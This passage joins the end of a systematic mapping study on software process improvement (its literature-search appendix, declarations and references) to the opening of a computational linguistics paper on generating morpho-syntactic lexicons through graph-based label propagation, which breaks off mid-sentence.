S6 and (C1 or C2) 535 1,746 762 1,863 9,182 484 14,572 S7 and (C1 or C2) 168 324 143 242 765 41 1,683 S8 and C2 114 105 433 1,015 6,341 366 8,374 Step 2: Removing Duplicates (‘Analysis preparation’) Duplicates per database 1,486 566 4,388 7,161 1,328 1,714 16,643 Duplicates across all databases 916 551 1,059 2,043 370 376 5,315 Step 3: In-depth Filtering (‘Filter queries’) Applying filters F1 and F2 578 – – 710 221 53 1,562 Unfiltered – 551 1,059 – – – 1,610 Result set (search process) 578 551 1,059 710 221 53 3,172 Step 4: Voting (‘Analysis preparation’) Final result set 283 65 114 103 67 3 635 Data collection in the initial study The initial study, inter alia, aimed at creating the baseline to study SPI. Therefore, the initial study was carried out with a considerable ‘‘manpower’’ that, however, is too costly for a continuous update. In this section, with the purpose of increasing transparency and reproducibility, we present the details of the initial data collection procedure (see also Kuhrmann et al., 2015), before presenting the implemented—and recommended— approach to conduct the study updates in Appendix ‘Data collection in the study update’. Query construction In a series of workshops, we defined the keywords that we are interested in and defined the general search strings in Table 10, which were then validated in several test runs before being used in an automated full-text search in several literature databases. The queries were built based on keyword lists given by the common terminology in the area of software processes and SPI. General queries. The general search strings S1–S8 were defined according to the relevant topics in SPI, e.g., improvement, assessment, measurement, ISO/IEC 15504, CMMI, quality management, and so forth. Due to the expected large number of results, we decided to complement the general search strings with context selectors C1 and C2 to limit the search to the domain of interest. Finally, we concluded the search strings shown in Table 10. Filter queries. Because of the full-text search, we expected a variety of publications including some overhead. Hence, we defined two filter queries F1 and F2 to be applied to the initial result set with the purpose of reducing the result set to the key publications. Query Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 31/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Table 10 Search strings used for the database search in the initial study Kuhrmann et al. (2015). Search string Addresses... S1 (life-cycle or lifecycle or life cycle) and (management or administration or development or description or authoring or deployment) process management: general life cycle S2 (life-cycle or lifecycle or life cycle) and (design or modeling or modelling or analysis or training) phases of the software process’s life cycle S3 modeling or modelling or model-based or approach or variant process modeling S4 optimization or optimisation or customization or customisation or tailoring process customization and tailoring S5 (measurement or evaluation or approach or variant or improvement) general measurement and improvement S6 reference model or quality management or evaluation or assessment or audit or CMMI or Capability Maturity Model Integration reference models and quality management S7 SCAMPI or Standard CMMI Appraisal Method for Process Improvement or SPICE or ISO/IEC 15504 or PSP or Personal Software Process or TSP or Team Software Process reference models and assessment approaches S8 (feasibility or experience) and (study or report) reported knowledge and empirical research C1 software process and (software development model or process model) context definition: software processes C2 SPI or software process improvement context definition: SPI F1 (SPI or software process improvement) and (approach or practice or management) SPI approaches, practices, and SPI management F2 (SPI or software process improvement) and report and (feasibility or experience) evaluation research on SPI, e.g., studies, reports, etc. F1 aims at finding all publications in the result set that explicitly present SPI approaches and practices, or that address the management of SPI. F2 aims at finding all reports in the context of SPI in which feasibility is analyzed or experiences are reported. While the initial search was a full-text search, the filter queries were applied to the abstracts only. However, for technical reasons, ACM and Springer abstracts were partially not available in the initial result set and, thus, the filtering was done manually during the voting procedure (cf. Appendix ‘Analysis preparation’). Data sources and data format The initial data collection was an automated full-text search in several literature databases. As main data sources, we relied on established literature databases, which we consider most appropriate for a search. In particular, we selected the following databases: ACM Digital Library, SpringerLink, IEEE Digital Library (Xplore), Wiley, Elsevier (Science Direct), and IET Software. If there was a paper listed in one of those databases, but was only referred, we counted it for the database that generated the item, regardless of the actual publication location. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 32/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 3We used the word clouds to visually inspect the result set for ‘‘intruders,’’ e.g., medicine, chemistry, and cancer therapy. Terms not matching our search criteria were collected and used to identify and remove the misselected papers from the result set. 4Please note: as our initial study resulted in a comprehensive Microsoft Excel spreadsheet, we also tailor the search and cleaning procedures to this tool. If you utilize a different tool, changes in the procedure might be necessary. Analysis preparation We performed an automated search that required us to filter and prepare the result set. The data analysis is prepared by harmonizing the data and performing a 2-staged voting process. Harmonization. Due to the query construction, we found a vast amount of multiple occurrences in the result set, and we also found a number of publications that are not in software engineering or computer science. To make the selection of the contributions more efficient, we first cleaned the initial result set (cf. Table 9 for the results per phase). In the first step, we removed the duplicates, which we identified by title, year, and author list. In the second step, we applied the filter queries to sort out those publications not devoted to software processes and SPI. To double-check the result set, we used word clouds generated from abstracts and keyword lists to validate if the result set meets our requirements.3 This procedure was performed individually per database and again on the integrated result set. Finally, we completed missing data to prepare the voting procedure. Voting the papers. The final selection whether or not a paper was included in the result set was made using a multi-staged voting procedure. This procedure was also applied in the study update and, therefore, is described in detail in ‘Analysis preparation’. Data collection in the study update In this section, we present the details about the recommended data collection procedure to be implemented for study updates. Search queries The major update in the search procedure is the search engine utilized for the search. Instead of repeating the search with individual databases (cf. Appendix ‘Data sources and data format’), we switched to Scopus, as Scopus as meta-search engine covers most of the relevant software engineering venues (journals as well as conferences). This however changes the general search procedure, notably the search strings need to be updated accordingly. The adapted search strings are summarized in Table 11. Comparing the new search queries to the initial study’s queries from Table 10, it becomes obvious that the context selectors and filter queries are now integrated with the search strings. We tested the new search queries several times on subsets of the initial study before executed them to carry out the actual data collection. Search and cleaning procedure Changing the search engine also affects the cleaning procedures thus requiring an updated cleaning and filtering approach. To apply the new search strings to a Scopus search, to clean the data, and to initiate the study selection, the following procedure4 needs to be applied: 1. Insert the search strings S1–S8 separately and use the time-range, i.e., conduct 8 individual searches for the required time slot of the update. 2. Set the automatic exclusion in Scopus using exclusion criterion EC2 (Table 2) to: ‘‘subject areas’’ = computer science, engineering or multiple 3. Set the automatic exclusion in Scopus using exclusion criterion EC1 (Table 2) to: ‘‘language’’ = ONLY English Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 33/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Table 11 Final search strings used for the automatic database search in the study update procedure. Search string S1 ((life-cycle or lifecycle or ‘‘life cycle’’) and (management or administration or development or description or authoring or deployment)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (SPI or ‘‘software process improvement’’)) S2 (modeling or modelling or model-based or approach or variant) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (SPI or ‘‘software process improvement’’)) S3 (optimization or optimisation or customization or customisation or tailoring) and ((‘‘software process’’ and (‘‘software de- velopment model’’ or ‘‘process model’’)) or (SPI or ‘‘software process improvement’’)) S4 (‘‘reference model’’ or ‘‘quality management’’ or evaluation or (assessment or audit) or (CMMI or ‘‘Capability Maturity Model Integration’’)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (SPI or ‘‘soft- ware process improvement’’)) S5 ((feasibility or experience) and (study or report)) and (SPI or ‘‘software process improvement’’) S6 ((life-cycle or lifecycle or ‘‘life cycle’’) and (design or modeling or modelling or analysis or training)) and ((‘‘software pro- cess’’ and (‘‘software development model’’ or ‘‘process model’’)) or (SPI or ‘‘software process improvement’’)) S7 (measurement or evaluation or approach or variant or improvement) and ((‘‘software process’’ and (‘‘software develop- ment model’’ or ‘‘process model’’)) or (SPI or ‘‘software process improvement’’)) S8 ((SCAMPI or ‘‘Standard CMMI Appraisal Method for Process Improvement’’) or (SPICE or ‘‘ISO/IEC 15504’’) or (PSP or ‘‘Personal Software Process’’) or (TSP or ‘‘Team Software Process’’)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (SPI or ‘‘software process improvement’’)) 4. Export all search results into one Microsoft Excel file. 5. Eliminate duplicates (EC4, Table 2) applying the duplicate elimination function in Microsoft Excel to the paper title (double-check and confirm by also checking authors and abstract). 6. Conduct the study selection procedures based on the inclusion and exclusion criteria listed in Table 2 following the procedure description in ‘Analysis procedures’. ADDITIONAL INFORMATION AND DECLARATIONS Funding Philipp Diebold’s activities in this study were partially conducted in a Software Campus project funded by the German Ministry of Education and Research (BMBF 01IS12053). Marco Kuhrmann and Jürgen Münch received no funding for this work. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: German Ministry of Education and Research: BMBF 01IS12053. Competing Interests The authors declare there are no competing interests. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 34/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Author Contributions • Marco Kuhrmann and Philipp Diebold conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables. • Jürgen Münch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The raw data has been supplied as Data S1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.62#supplemental-information. REFERENCES Allison I. 2010. Organizational factors shaping software process improvement in small- medium sized software teams: A multi-case analysis. In: International conference on the quality of information and communications technology. Piscataway: IEEE, 418–423. Baddoo N, Hall T. 2003. De-motivators for software process improvement: an analysis of practitioners’ views. Journal of Systems and Software 66(1):23–33 DOI 10.1016/S0164-1212(02)00060-2. Bayona-Oré S, Calvo-Manzano J, Cuevas G, San-Feliu T. 2014. Critical success factors taxonomy for software process deployment. Software Quality Journal 22(1):21–48 DOI 10.1007/s11219-012-9190-y. Brodman JG, Johnson DL. 1994. What small businesses and small organizations say about the cmm. In: International Conference on Software Engineering. Piscataway: IEEE, 331–340. Coleman G, O’Connor R. 2008. Investigating software process in practice: a grounded theory perspective. Journal of Systems and Software 81(5):772–784 DOI 10.1016/j.jss.2007.07.027. Diebold P, Ostberg J-P, Wagner S, Zendler U. 2015. What do practitioners vary in using scrum? In: International conference XP. Berlin Heidelberg: Springer, 40–51. Dybå T. 2000. An instrument for measuring the key factors of success in software process improvement. Empirical Software Engineering 5(4):357–390 DOI 10.1023/A:1009800404137. El-Emam K, Goldenson DR. 2000. An empirical review of software process assessments. Advances in Computers 53:319–423 DOI 10.1016/S0065-2458(00)80008-X. Hall T, Rainer A, Baddoo N. 2002. Implementing software process improvement: an empirical study. Software Process: Improvement and Practice 7(1):3–15 DOI 10.1002/spip.150. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 35/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62/supp-1 http://dx.doi.org/10.7717/peerj-cs.62#supplemental-information http://dx.doi.org/10.7717/peerj-cs.62#supplemental-information http://dx.doi.org/10.1016/S0164-1212(02)00060-2 http://dx.doi.org/10.1016/S0164-1212(02)00060-2 http://dx.doi.org/10.1007/s11219-012-9190-y http://dx.doi.org/10.1007/s11219-012-9190-y http://dx.doi.org/10.1016/j.jss.2007.07.027 http://dx.doi.org/10.1023/A:1009800404137 http://dx.doi.org/10.1016/S0065-2458(00)80008-X http://dx.doi.org/10.1002/spip.150 http://dx.doi.org/10.1002/spip.150 http://dx.doi.org/10.7717/peerj-cs.62 Hannay JE, Benestad HC. 2010. Perceived productivity threats in large agile development projects. In: Proceedings of the International Symposium on Empirical Software Engineering and Measurement. New York: ACM, 15:1–15:10. Helgesson YYL, Höst M, Weyns K. 2012. A review of methods for evaluation of maturity models for process improvement. Journal of Software: Evolution and Process 24(4):436–454 DOI 10.1002/smr.560. Horvat RV, Rozman I, Györkös J. 2000. Managing the complexity of spi in small compa- nies. Software Process: Improvement and Practice 5(1):45–54 DOI 10.1002/(SICI)1099-1670(200003)5:1<45::AID-SPIP110>3.0.CO;2-2. Hull M, Taylor P, Hanna J, Millar R. 2002. Software development processes—an assess- ment. Information and Software Technology 44(1):1–12 DOI 10.1016/S0950-5849(01)00158-6. Humphrey WS. 1989. Managing the software process. Boston: Addison-Wesley. Kitchenham B, Charters S. 2007. Guidelines for performing systematic literature reviews in software engineering. Technical Report EBSE-2007-01. Keele University. Korhonen K. 2013. Evaluating the impact of an agile transformation: a longitudinal case study in a distributed context. Software Quality Journal 21(4):599–624 DOI 10.1007/s11219-012-9189-4. Kuhrmann M, Diebold P, Münch J, Tell P. How does software process improvement address global software engineering? In: International Conference on Global Software Engineering, ICGSE. Piscataway: IEEE (in Press). Kuhrmann M, Fernández DM, Tiessler M. 2014. A mapping study on the feasibility of method engineering. Journal of Software: Evolution and Process 26(12):1053–1073 DOI 10.1002/smr.1642. Kuhrmann M, Konopka C, Nellemann P, Diebold P, Münch J. 2015. Software process improvement: Where is the evidence? In: Proceedings of the international conference of software and system process, ICSSP. New York: ACM, 54–63. Laporte C, O’Connor R. 2014. Systems and software engineering standards for very small entities: implementation and initial results. In: Proceedings of the international conference on the quality of information and communications technology, QUATIC. Piscataway: IEEE, 38–47. Monteiro LFS, De Oliveira KM. 2011. Defining a catalog of indicators to support process performance analysis. Journal of Software Maintenance and Evolution: Research and Practice 23(6):395–422 DOI 10.1002/smr.482. Murphy B, Bird C, Zimmermann T, Williams L, Nagappan N, Begel A. 2013. Have agile techniques been the silver bullet for software development at microsoft. In: International symposium on empirical software engineering and measurement. New York, Piscataway: ACM/IEEE. Müller SD, Mathiassen L, Balshøj HH. 2010. Software process improvement as orga- nizational change: a metaphorical analysis of the literature. Journal of Systems and Software 83(11):2128–2146 DOI 10.1016/j.jss.2010.06.017. Münch J, Armbrust O, Kowalczyk M, Sotó M. 2012. Software process definition and management. Berlin Heidelberg: Springer. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 36/38 https://peerj.com http://dx.doi.org/10.1002/smr.560 http://dx.doi.org/10.1002/(SICI)1099-1670(200003)5:1<45::AID-SPIP110>3.0.CO;2-2 http://dx.doi.org/10.1016/S0950-5849(01)00158-6 http://dx.doi.org/10.1007/s11219-012-9189-4 http://dx.doi.org/10.1007/s11219-012-9189-4 http://dx.doi.org/10.1002/smr.1642 http://dx.doi.org/10.1002/smr.1642 http://dx.doi.org/10.1002/smr.482 http://dx.doi.org/10.1016/j.jss.2010.06.017 http://dx.doi.org/10.7717/peerj-cs.62 Paulish D, Carleton A. 1994. Case studies of software-process-improvement measure- ment. IEEE Computer 27(9):50–57. Petersen K, Feldt R, Mujtaba S, Mattson M. 2008. Systematic mapping studies in software engineering. In: International conference on evaluation & assessment in software engineering. New York: ACM, 68–77. Pino FJ, Alegría JAH, García F, Piattini M. 2009. A process for driving process im- provement in VSEs. In: International conference on software process. Lecture notes in computer science, vol. 5543. Berlin Heidelberg: Springer, 342–353. Pino F, García F, Piattini M. 2008. Software process improvement in small and medium software enterprises: a systematic review. Software Quality Journal 16(2):237–261 DOI 10.1007/s11219-007-9038-z. Pries-Heje J, Johansen J. 2010. Spi manifesto. Available at http://www.iscn.com/Images/ SPI_Manifesto_A.1.2.2010.pdf . Rainer A, Hall T. 2001. An analysis of some ‘core studies’ of software process improve- ment. Software Process: Imprmnt and Practice 6(4):169–187 DOI 10.1002/spip.147. Raninen A, Ahonen JJ, Sihvonen H-M, Savolainen P, Beecham S. 2012. LAPPI: A light-weight technique to practical process modeling and improvement target identification. Journal of Software: Evolution and Process 25(9):915–933 DOI 10.1002/smr.1571. Rozman I, Vajde Horvat R, Gyórkós J, Hericùko M. 1997. Processus—integration of sei cmm and iso quality models. Software Quality Journal 6(1):37–63 DOI 10.1023/A:1018539413913. Salo O, Abrahamsson P. 2007. An iterative improvement process for agile software development. Software Process: Improvement and Practice 12(1):81–100 DOI 10.1002/spip.305. Schweigert T, Vohwinkel D, Korsaa M, Nevalainen R, Biro M. 2013. Agile maturity model: a synopsis as a first step to synthesis. In: Proceedings of european conference on systems, software and services process improvement (EuroSPI). Berlin Heidelberg: Springer, 214–227. Shaw M. 2003. Writing good software engineering research papers: Minitutorial. In: International conference on software engineering. Piscataway: IEEE, 726–736. Staples M, Niazi M. 2008. Systematic review of organizational motivations for adopt- ing cmm-based spi. Information and Software Technology 50(7–8):605–620 DOI 10.1016/j.infsof.2007.07.003. Staples M, Niazi M, Jeffery R, Abrahams A, Byatt P, Murphy R. 2007. An exploratory study of why organizations do not adopt CMMI. Journal of Systems and Software 80(6):883–895 DOI 10.1016/j.jss.2006.09.008. Stelzer D, Mellis W. 1998. Success factors of organizational change in software pro- cess improvement. Software Process: Improvement and Practice 4(4):227–250 DOI 10.1002/(SICI)1099-1670(199812)4:4<227::AID-SPIP106>3.0.CO;2-1. Theocharis G, Kuhrmann M, Münch J, Diebold P. 2015. Is water-scrum-fall reality? on the use of agile and traditional development practices. In: Proceedings of the Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 37/38 https://peerj.com http://dx.doi.org/10.1007/s11219-007-9038-z http://dx.doi.org/10.1007/s11219-007-9038-z http://www.iscn.com/Images/SPI_Manifesto_A.1.2.2010.pdf http://www.iscn.com/Images/SPI_Manifesto_A.1.2.2010.pdf http://dx.doi.org/10.1002/spip.147 http://dx.doi.org/10.1002/smr.1571 http://dx.doi.org/10.1023/A:1018539413913 http://dx.doi.org/10.1023/A:1018539413913 http://dx.doi.org/10.1002/spip.305 http://dx.doi.org/10.1016/j.infsof.2007.07.003 http://dx.doi.org/10.1016/j.infsof.2007.07.003 http://dx.doi.org/10.1016/j.jss.2006.09.008 http://dx.doi.org/10.1002/(SICI)1099-1670(199812)4:4<227::AID-SPIP106>3.0.CO;2-1 http://dx.doi.org/10.1002/(SICI)1099-1670(199812)4:4<227::AID-SPIP106>3.0.CO;2-1 http://dx.doi.org/10.7717/peerj-cs.62 international conference on product-focused software process improvement. Lecture notes in computer science, vol. 9459. Berlin Heidelberg: Springer, 149–166. Tripp J, Armstrong D. 2014. Exploring the relationship between organizational adoption motives and the tailoring of agile methods. In: Hawaii international conference on system sciences (HICSS), 4799–4806. Umarji M, Seaman C. 2008. Why do programmers avoid metrics? In: Proceedings of the international symposium on empirical software engineering and measurement. New York: ACM, 129–138. Unterkalmsteiner M, Gorschek T, Islam A, Cheng CK, Permadi R, Feldt R. 2012. Evaluation and measurement of software process improvement—a systematic literature review. IEEE Transactions on Software Engineering 38(2):398–424 DOI 10.1109/TSE.2011.26. VersionOne. 2006-2014. State of agile survey. Available at http://www.versionone.com/ agile-resources/more-resources/blogs/ . Viana D, Conte T, Vilela D, De Souza CRB, Santos G, Prikladnicki R. 2012. The influence of human aspects on software process improvement: qualitative research findings and comparison to previous studies. In: International conference on evalua- tion & assessment in software engineering. IET, 121–125. Vijayasarathy L, Butler C. 2015. Choice of software development methodologies—do project, team and organizational characteristics matter? IEEE Software 1:1 Preprint DOI 10.1109/MS.2015.26. West D. 2011. Water-Scrum-Fall is the reality of agile for most organizations today. Technical report. Forrester. Wieringa R, Maiden N, Mead N, Rolland C. 2005. Requirements engineering paper classification and evaluation criteria: a proposal and a discussion. Requirements Engineering 11(1):102–107. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 38/38 https://peerj.com http://dx.doi.org/10.1109/TSE.2011.26 http://dx.doi.org/10.1109/TSE.2011.26 http://www.versionone.com/agile-resources/more-resources/blogs/ http://www.versionone.com/agile-resources/more-resources/blogs/ http://dx.doi.org/10.1109/MS.2015.26 http://dx.doi.org/10.1109/MS.2015.26 http://dx.doi.org/10.7717/peerj-cs.62 work_4mhuno2zhbhupdwgmqajqhbcye ---- Morpho-syntactic Lexicon Generation Using Graph-based Semi-supervised Learning Manaal Faruqui Carnegie Mellon University mfaruqui@cs.cmu.edu Ryan McDonald Google Inc. ryanmcd@google.com Radu Soricut Google Inc. rsoricut@google.com Abstract Morpho-syntactic lexicons provide informa- tion about the morphological and syntactic roles of words in a language. Such lexicons are not available for all languages and even when available, their coverage can be limited. We present a graph-based semi-supervised learning method that uses the morphologi- cal, syntactic and semantic relations between words to automatically construct wide cover- age lexicons from small seed sets. Our method is language-independent, and we show that we can expand a 1000 word seed lexicon to more than 100 times its size with high quality for 11 languages. In addition, the automatically created lexicons provide features that improve performance in two downstream tasks: mor- phological tagging and dependency parsing. 1 Introduction Morpho-syntactic lexicons contain information about the morphological attributes and syntactic roles of words in a given language. A typical lexicon contains all possible attributes that can be displayed by a word. Table 1 shows some entries in a sample English morpho-syntactic lexicon. As these lexicons contain rich linguistic information, they are useful as features in downstream NLP tasks like machine translation (Nießen and Ney, 2004; Minkov et al., 2007; Green and DeNero, 2012), part of speech tag- ging (Schmid, 1994; Denis and Sagot, 2009; Moore, 2015), dependency parsing (Goldberg et al., 2009), language modeling (Arisoy et al., 2010) and mor- phological tagging (Müller and Schuetze, 2015) in- ter alia. There are three major factors that limit the use of such lexicons in real world applications: (1) played POS:VERB, TENSE:PAST, VFORM:FIN, . . . playing POS:VERB, TENSE:PRES, VFORM:GER, . . . awesome POS:ADJ, DEGREE:POS Table 1: A sample English morpho-syntactic lexicon. They are often constructed manually and are expen- sive to obtain (Kokkinakis et al., 2000; Dukes and Habash, 2010); (2) They are currently available for only a few languages; and (3) Size of available lexi- cons is generally small. In this paper, we present a method that takes as in- put a small seed lexicon, containing a few thousand annotated words, and outputs an automatically con- structed lexicon which contains morpho-syntactic attributes (henceforth referred to as attributes) for a large number of words of a given language. We model the problem of morpho-syntactic lexicon gen- eration as a graph-based semi-supervised learning problem (Zhu, 2005; Bengio et al., 2006; Subra- manya and Talukdar, 2014). We construct a graph where nodes represent word types and the goal is to label them with attributes. The seed lexicon pro- vides attributes for a subset of these nodes. Nodes are connected to each other through edges that de- note features shared between them or surface mor- phological transformation between them. Our entire framework of lexicon generation, in- cluding the label propagation algorithm and the fea- ture extraction module is language independent. We only use word-level morphological, semantic and syntactic relations between words that can be in- duced from unannotated corpora in an unsuper- 1 Transactions of the Association for Computational Linguistics, vol. 4, pp. 1–16, 2016. Action Editor: Alexander Clark. Submission batch: 10/2015; Revision batch: 12/2015; Published 1/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. play played playing run running clus:20 prefix:pl, suffix:{null}:ed prefix:pl suffix:ing:ed clus:15 suffix:ing suffix:{null}:ning prefix:pl suffix:{null}:ing Figure 1: A subgraph from the complete graph of English showing different kinds of features shared on the edges between words. Some possible features/edges have been removed for enhancing clarity. vised manner. One particularly novel aspect of our graph-based framework is that edges are fea- turized. Some of these features measure similarity, e.g., singular nouns tend to occur in similar distri- butional contexts as other singular nouns, but some also measure transformations from one inflection to another, e.g., adding a ‘s’ suffix could indicate flip- ping the NUM:SING attribute to NUM:PLUR (in En- glish). For every attribute to be propagated, we learn weights over features on the edges separately. This is in contrast to traditional label propagation, where edges indicate similarity exclusively (Zhu, 2005). We construct lexicons in 11 languages of vary- ing morphological complexity. We perform intrin- sic evaluation of the quality of generated lexicons obtained from either the universal dependency tree- bank or created manually by humans (§4). We show that these automatically created lexicons provide useful features in two extrinsic NLP tasks which re- quire identifying the contextually plausible morpho- logical and syntactic roles: morphological tagging (Hajič and Hladká, 1998; Hajič, 2000) and syntactic dependency parsing (Kübler et al., 2009). We ob- tain an average of 15.4% and 5.3% error reduction across 11 languages for morphological tagging and dependency parsing respectively on a set of publicly available treebanks (§5). We anticipate that the lexi- cons thus created will be useful in a variety of NLP problems. 2 Graph Construction The approach we take propagates information over lexical graphs (§3). In this section we describe how to construct the graph that serves as the backbone of our model. We construct a graph in which nodes are word types and directed edges are present be- tween nodes that share one or more features. Edges between nodes denote that there might be a relation- ship between the attributes of the two nodes, which we intend to learn. As we want to keep our model language independent, we use edge features that can be induced between words without using any lan- guage specific tools. To this end, we describe three features in this section that can be obtained using unlabeled corpora for any given language.1 Fig. 1 shows a subgraph of the full graph constructed for English. Word Clusters. Previous work has shown that un- labeled text can be used to induce unsupervised word clusters which can improve the performance of many NLP tasks in different languages (Clark, 2003; Koo et al., 2008; Turian et al., 2010; Faruqui and Padó, 2010; Täckström et al., 2012; Owoputi et al., 2013). Word clusters capture semantic and syntactic similarities between words, for example, play and run are present in the same cluster. We obtain word clusters by using Exchange clustering algorithm (Kneser and Ney, 1993; Martin et al., 1998; Uszkoreit and Brants, 2008) on large unla- beled corpus of every language. As in Täckström et al. (2012), we use one year of news articles scrapped from a variety of sources and cluster only the most frequent 1M words into 256 different clusters. An edge was introduced for every word pair sharing the same word cluster and a feature for the cluster is fired. Thus, there are 256 possible cluster features on an edge, though in our case only a single one can fire. Suffix & Prefix. Suffixes are often strong indi- cators of the morpho-syntactic attributes of a word (Ratnaparkhi, 1996; Clark, 2003). For example, in English, -ing denotes gerund verb forms like, study- ing, playing and -ed denotes past tense like studied, played etc. Prefixes like un-, in- often denote ad- jectives. Thus we include both 2-gram and 3-gram 1Some of these features can cause the graph to become very dense making label propagation prohibitive. We keep the size of the graph in check by only allowing a word node to be con- nected to at most 100 other (randomly selected) word nodes sharing one particular feature. This reduces edges while still keeping the graph connected. 2 suffix and prefix as edge features.2 We introduce an edge between two words sharing a particular suffix or prefix feature. Morphological Transformations. Soricut and Och (2015) presented an unsupervised method of inducing prefix- and suffix-based morphological transformations between words using word embed- dings. In their method, statistically, most of the transformations are induced between words with the same lemma (without using any prior information about the word lemma). For example, their method induces the transformation between played and playing as suffix:ed:ing. This feature indicates TENSE:PAST to turn off and TENSE:PRES to turn on.3 We train the morphological transformation prediction tool of Soricut and Och (2015) on the news corpus (same as the one used for training word clusters) for each language. An edge is introduced between two words that exhibit a morphological transformation feature from one word to another as indicated by the tool’s output. Motivation for the Model. To motivate our model, consider the words played and playing. They have a common attribute POS:VERB but they differ in tense, showing TENSE:PAST and TENSE:PRES resp. Typical graph-propagation algorithms model similarity (Zhu, 2005) and thus propagate all at- tributes along the edges. However, we want to model if an attribute should propagate or change across an edge. For example, having a shared cluster feature, is an indication of similar POS tag (Clark, 2003; Koo et al., 2008; Turian et al., 2010), but a sur- face morphological transformation feature like suf- fix:ed:ing possibly indicates a change in the tense of the word. Thus, we will model attributes prop- agation/transformation as a function of the features shared on the edges between words. The features described in this section are specially suitable for languages that exhibit concatenative morphology, like English, German, Greek etc. and might not work very well with languages that exhibit non- concatenative morphology i.e, where root modifica- tion is highly frequent like in Arabic and Hebrew. 2We only include those suffix and prefix which appear at least twice in the seed lexicon. 3Our model will learn the following transformation: TENSE:PAST: 1 → -1, TENSE:PRESENT: -1 → 1 (§3). However, it is important to note that our framework is not limited to just the features described here, but can incorporate any arbitrary information over word pairs (§8). 3 Graph-based Label Propagation We now describe our model. Let W = {w1,w2, . . . ,w|W|} be the vocabulary with |W| words and A = {a1,a2, . . . ,a|A|} be the set of lexical attributes that words in W can ex- press; e.g. W = {played,playing, . . .} and A = {NUM:SING, NUM:PLUR, TENSE:PAST, . . .}. Each word type w ∈ W is associated with a vec- tor aw ∈ [−1,1]|A|, where ai,w = 1 indicates that word w has attribute i and ai,w = −1 indicates its absence; values in between are treated as degrees of uncertainty. For example, TENSE:PASTplayed = 1 and TENSE:PASTplaying = −1.4 The vocabulary W is divided into two disjoint subsets, the labeled words L for which we know their aw’s (obtained from seed lexicon)5 and the un- labeled words U whose attributes are unknown. In general |U| � |L|. The words in W are organized into a directed graph with edges E between words. Let, vector φ(w,v) ∈ [0,1]|F| denote the features on the directed edge between words w and v, with 1 indicating the presence and 0 the absence of fea- ture fk ∈ F, where, F = {f1,f2, . . . ,f|F|} are the set of possible binary features shared between two words in the graph. For example, the features on edges between played and playing from Fig. 1 are: φk(played,playing) =    1, iffk = suffix:ed:ing 1, iffk = prefix:pl 0, iffk = suffix:ly . . . We seek to determine which subsets of A are valid for each word w ∈ W. We learn how a particular attribute of a node is a function of that particular attribute of its neighboring nodes and features on the edge connecting them. Let ai,w be an attribute of word w and let âi,w be the empirical estimate of that 4We constrain ai,w ∈ [−1, 1] as its easier to model the flip- ping of an attribute value from −1 to 1 as opposed to [0, 1]. 5We use labeled, seed, and training lexicon to mean the same thing interchangeably. 3 <1, -1, …, -1> <0, 0, …, 0> <0.2, 0.1, …, 0.9> <1, -1, …, -1> <0.2, 0.1, …, 0.9> <-1, -1, …, -1> <1, 1, …, 1> <1, -1, …, 1> <1, 1, …, -1> Figure 2: Word graph with edges between words showing the labeled (grey) and the unlabeled (white) word nodes. Only nodes connected via solid edges are visible to each other, dotted edges block visibility. This figure demonstrates interaction between nodes during model estimation (left), label propagation (center), and paradigm projection (right). Attribute-value vectors of the words are shown in angled brackets. The solid edge in the right figure shows the closest attribute paradigm to which the empirical vector is projected. attribute. We posit that âi,w can be estimated from the neighbors N(w) of w as follows: âi,w = tanh   ∑ v∈N(w) (φ(w,v) ·θi)×ai,v   (1) where, θi ∈ R|F| is weight vector of the edge fea- tures for estimating attribute ai. ‘·’ represents dot product betwen two vectors. We use tanh as the non- linearity to make sure that âi,w ∈ [−1,1]. The set of such weights θ ∈ R|A|×|F| for all attributes are the model parameters that we learn. Our graph resem- bles the Ising model, which is a lattice model pro- posed for describing intermolecular forces (Ising, 1925), and eq. 1 solves the naive mean field approx- imation of the Ising model (Wang et al., 2007). Intuitively, one can view the node to node mes- sage function from v to w: φ(w,v)·θi×ai,v as either (1) supporting the value ai,v when φ(w,v) ·θi > 0; (2) inverting ai,v when φ(w,v) · θi < 0; or (3) dampening or neutering ai,v when φ(w,v) ·θi ≈ 0. Returning to our motivation, if w = played and v = playing, a feature indicating the suffix sub- stitution suffix:ed:ing should have a highly nega- tive weight for TENSE:PAST, indicating a change in value. This is because TENSE:PAST = -1 for play- ing, and a negative value of φ(w,v) ·θi will push it to positive for played. It should be noted that this framework for con- structing lexicons does not explicitly distinguish between morpho-syntactic paradigms, but simply identifies all possible attribute-values a word can take. If we consider an example like “games” and two attributes, the syntactic part-of-speech, POS, and number, NUM, games can either be 1) {POS:VERB, NUM:SING}, as in John games the system; or {POS:NOUN, NUM:PLUR}, as in The games have started. Our framework will mereley return that all the above attribute-values are possi- ble, which implies that the singluar noun and plu- ral verb interpretations are valid. One possible way to account for this is to make full morphological paradigms the “attributes” in or 